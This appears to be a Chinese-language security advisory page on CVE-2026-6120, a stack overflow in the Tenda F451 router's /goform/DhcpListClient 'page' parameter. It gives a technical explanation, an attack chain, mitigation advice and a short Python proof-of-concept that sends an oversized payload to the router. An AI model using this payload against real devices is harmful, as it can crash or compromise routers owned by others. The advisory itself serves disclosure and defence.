IPBUF安全漏洞报告
English
CVE-2026-6120 CVSS 8.8 高危

CVE-2026-6120 Tenda F451路由器栈溢出漏洞

披露日期: 2026-04-12
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-6120
漏洞类型
缓冲区溢出
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Tenda F451

相关标签

缓冲区溢出栈溢出RCETendaIoT路由器

漏洞概述

Tenda F451路由器在1.0.0.7版本中存在严重的栈缓冲区溢出漏洞。该漏洞位于httpd组件的/goform/DhcpListClient接口,由于对page参数处理不当导致。远程攻击者无需用户交互,仅凭低权限即可发送恶意数据包触发溢出,从而可能完全控制设备,严重威胁网络安全。

技术细节

漏洞根源在于Tenda F451路由器Web服务器组件对`fromDhcpListClient`函数的处理逻辑存在缺陷。具体而言,当处理来自/goform/DhcpListClient的POST请求时,程序未对`page`参数进行有效的边界检查,直接使用不安全的函数(如strcpy)将其复制到栈上的局部变量中。由于该缓冲区大小固定,攻击者可以通过发送超长的数据包覆盖栈上的关键数据,包括基指针(EBP)和返回地址。考虑到设备的架构(通常为MIPS或ARM),攻击者可精心构造ROP链以绕过地址随机化保护(如果存在),最终劫持程序流程,执行任意系统命令,实现从低权限用户到Root权限的提权。

攻击链分析

STEP 1
侦察
攻击者扫描网络识别Tenda F451设备及其固件版本。
STEP 2
漏洞利用
向/goform/DhcpListClient接口发送包含恶意page参数的HTTP POST请求。
STEP 3
溢出触发
恶意数据导致栈缓冲区溢出,覆盖返回地址。
STEP 4
代码执行
程序跳转至攻击者控制的指令,执行任意代码获取设备控制权。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit(target_ip): url = f"http://{target_ip}/goform/DhcpListClient" # Buffer overflow payload # Note: Offset and return address need to be adjusted based on specific firmware version and architecture padding = b"A" * 500 payload = padding + b"\x00\x00\x00\x00" data = { "page": payload.decode('latin-1') } try: print(f"[+] Sending payload to {target_ip}...") response = requests.post(url, data=data, timeout=5) print(f"[+] Response status: {response.status_code}") except Exception as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": exploit("192.168.0.1")

影响范围

Tenda F451 1.0.0.7

防御指南

临时缓解措施
建议立即在防火墙上阻断外部对路由器管理端口的访问,仅允许内网受信任主机连接;同时密切关注厂商安全公告,在补丁发布前应暂停使用该设备或将其隔离在受控网络环境中。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表